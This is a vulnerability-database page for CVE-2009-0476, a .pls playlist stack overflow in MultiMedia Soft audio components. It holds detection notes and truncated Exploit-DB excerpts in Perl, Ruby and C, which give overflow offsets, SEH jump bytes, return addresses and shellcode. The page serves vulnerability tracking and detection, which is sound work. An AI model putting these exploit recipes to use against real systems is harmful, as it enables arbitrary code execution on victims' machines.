CVE-2009-0476
published 2009-02-08CVE-2009-0476: Stack-based buffer overflow in MultiMedia Soft AdjMmsEng.dll 7.11.1.0 and 7.11.2.7, as distributed in multiple MultiMedia Soft audio components for .NET…
PriorityP357critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
37.04%
98.3th percentile
Stack-based buffer overflow in MultiMedia Soft AdjMmsEng.dll 7.11.1.0 and 7.11.2.7, as distributed in multiple MultiMedia Soft audio components for .NET, allows remote attackers to execute arbitrary code via a long string in a playlist (.pls) file, as originally reported for Euphonics Audio Player 1.0. NOTE: some of these details are obtained from third party information.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D
- →Overflow trigger offset is 1308 bytes before SEH overwrite in Audiotran 1.4.1; monitor for .pls files with anomalously long strings exceeding this length. ↗
- →Overflow trigger offset is 1940 bytes before nSEH/SEH overwrite in MP3 Workstation 9.2.1.1.2; .pls files with padding of this length are malicious. ↗
- →Overflow trigger offset is 1324 bytes in Euphonics Audio Player 1.0; .pls files with a string of this length followed by a return address are exploit indicators. ↗
- →SEH-based exploitation uses short jump opcode \xeb\x06\x90\x90 as nSEH value; detect this 4-byte sequence at offset 1940 within a .pls file. ↗
- →BadChars for payload construction are null byte, newline, and equals sign (\x00\x0a\x3d); shellcode in malicious .pls files will avoid these bytes. ↗
- →The vulnerable DLL rsaadjd.tmp is used as a p/p/r gadget source in Audiotran exploits; presence of this file alongside Audiotran is a risk indicator. ↗
- ·The Metasploit module targets Audiotran 1.4.1 with a Windows Universal target using a single hardcoded return address; a separate module exists for Audiotran 1.4.2.4, indicating the offset/ret may differ between minor versions. ↗
- ·The vulnerability resides in AdjMmsEng.dll versions 7.11.1.0 and 7.11.2.7, distributed across multiple MultiMedia Soft audio components; detection should cover all applications bundling this DLL, not just Audiotran or Euphonics. ↗
- ·Remote exploitation via browser is theoretically possible if the .pls extension is registered to the vulnerable application, but this vector was not tested in the Metasploit module. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MP3 Workstation 9.2.1.1.2 - Local Overflow (SEH)
exploitdb·2010-09-15
CVE-2009-0476 MP3 Workstation 9.2.1.1.2 - Local Overflow (SEH)
MP3 Workstation 9.2.1.1.2 - Local Overflow (SEH)
---
#MP3 Workstation Version 9.2.1.1.2 SEH exploit
#Author Sanjeev Gupta san.gupta86[at]gmail.com
#Download Vulnerable application from http://www.e-soft.co.uk/MP3%20Workstation.htm
#Vulnerable version MP3 Workstation Version 9.2.1.1.2
#Tested on XP SP2
#Greets Puneet Jain
my $head = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D";
my $fuck = "\x41" x 1940;
my $nseh = "\xeb\x06\x90\x90"; # short jump
my $seh = pack('V',0x735275CB); #0x735275CB msvbvm60.dll p/p/r
my $slide = "\x90" x 12;
my $code =
"\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA".
"\x4C\xA8\x75\x76\x83\xC0\x04\x31\x50\x13\x03\x1C\xBB\x97\x83\x60".
"\x53\xDE\x6C\x98\xA4\x81\xE5\x7D\x95\x93\x92\xF6\x84\x23\xD0\x5A".
"\x25\xCF\xB4\x4E\xBE\xBD\x1
Exploit-DB
Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
exploitdb·2010-01-28
CVE-2009-0476 Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: audiotran_pls.rb 8306 2010-01-28 21:04:01Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the PLS extention is registered to Audi
Exploit-DB
Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow
exploitdb·2010-01-10
CVE-2009-0476 Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow
Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow
---
#!/usr/bin/ruby
#
# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Date : January 9th, 2010
# Author : Sébastien Duquette
# Software Link : http://www.e-soft.co.uk/Audiotran.htm
# Version : 1.4.1
# OS : Windows
# Tested on : XP SP2/SP3 En (VMware)
# Type of vuln : Stack Overflow / SEH
# Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
#
banner =
"|------------------------------------------------------------------|\n" +
"| __ __ |\n" +
"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n" +
"| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n" +
"|
Exploit-DB
Audio Workstation - '.pls' Local Buffer Overflow (SEH)
exploitdb·2009-09-24
CVE-2009-0476 Audio Workstation - '.pls' Local Buffer Overflow (SEH)
Audio Workstation - '.pls' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
=gnk
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)
[�] Exploited by:.......[ germaya_x ].....................
[�] Script:.............[ Audio Workstation ].....................
[�] version:............[ 6.4.2.4.0 ]
[�] Today:..............[ 24/09/2009 ].....................
[�] platform............[ Windows ].....................
[�] tested on:..........[ Windows XP SP2 ].....................
[�] greetz:.............[ his0k4/D3v!LFUCK3R ].....................
=cut
##############################################################################
my
Exploit-DB
Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow
exploitdb·2009-02-04
CVE-2009-0476 Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow
Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow
---
#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : Houssamix
# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit
# Gr33tz to : str0ke , real-power.net , Legend-spy - stack
# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958
# just the ret adress is changed for make the exploit universal
#-----------------------------------------------------------------------------
my $overflow = "\x41" x 1324;
my $ret = "\xCB\xA3\x0F\x10"; # jmp esp from AdjMmsEng.dll >$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done \n";
# milw0rm.com [2009-02-04]
Exploit-DB
Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow
exploitdb·2009-02-04
CVE-2009-0476 Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow
Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow
---
#include
#include
#include
#define overflow 1324
#define NOP 0x90
#define pls "Eye.pls"
int main (int argc,char **argv)
{
char winsp3[] = "\x7B\x46\x86\x7C";
char buffer[overflow];
FILE *Player;
unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
"\x96\x7d\xb2\x83\xeb\xfc\xe2\xf4\x10\x7e\x39\xb2\xec\x96\xf6\xf7"
"\xd0\x1d\x01\xb7\x94\x97\x92\x39\xa3\x8e\xf6\xed\xcc\x97\x96\xfb"
"\x67\xa2\xf6\xb3\x02\xa7\xbd\x2b\x40\x12\xbd\xc6\xeb\x57\xb7\xbf"
"\xed\x54\x96\x46\xd7\xc2\x59\xb6\x99\x73\xf6\xed\xc8\x97\x96\xd4"
"\x67\x9a\x36\x39\xb3\x8a\x7c\x59\x67\x8a\xf6\xb3\x07\x1f\x21\x96"
"\xe8\x55\x4c\x72\x88\x1d\x3d\x82\x69\x56\x05\xbe\x67\xd6\x71\x39"
"\x9c\x8a\xd0\x39\x84\x9e
Exploit-DB
Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow
exploitdb·2009-02-03
CVE-2009-0476 Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow
Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow
---
#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : h4ck3r#47
# Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit
# Tested in Windows Pro Sp3 (English)
# Gr33tz to : str0ke , T.N.T:18 , AlpHaNiX , All arab4services.net and friends
#-----------------------------------------------------------------------------
my $overflow = "\x41" x 1324;
my $ret = "\x7B\x46\x86\x7C"; # jmp ESP from kernel32.dll in Windows pro Sp3
my $nop = "\x90" x 100 ;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $shellcode =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\
Metasploit
Audiotran PLS File Stack Buffer Overflow
metasploit
Audiotran PLS File Stack Buffer Overflow
Audiotran PLS File Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4. An attacker must send the file to victim and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded PLS file within a browser when the PLS extension is registered to Audiotran. This alternate vector has not been tested and cannot be exercised directly with this module.
Metasploit
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
metasploit
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Audiotran. This functionality has not been tested in this module.
Metasploit
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
metasploit
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/33791http://secunia.com/advisories/33817http://www.securityfocus.com/archive/1/500652/100/0/threadedhttp://www.securityfocus.com/bid/33589http://www.vupen.com/english/advisories/2009/0316https://www.exploit-db.com/exploits/7958https://www.exploit-db.com/exploits/7973https://www.exploit-db.com/exploits/7974http://secunia.com/advisories/33791http://secunia.com/advisories/33817http://www.securityfocus.com/archive/1/500652/100/0/threadedhttp://www.securityfocus.com/bid/33589http://www.vupen.com/english/advisories/2009/0316https://www.exploit-db.com/exploits/7958https://www.exploit-db.com/exploits/7973https://www.exploit-db.com/exploits/7974
2009-02-08
Published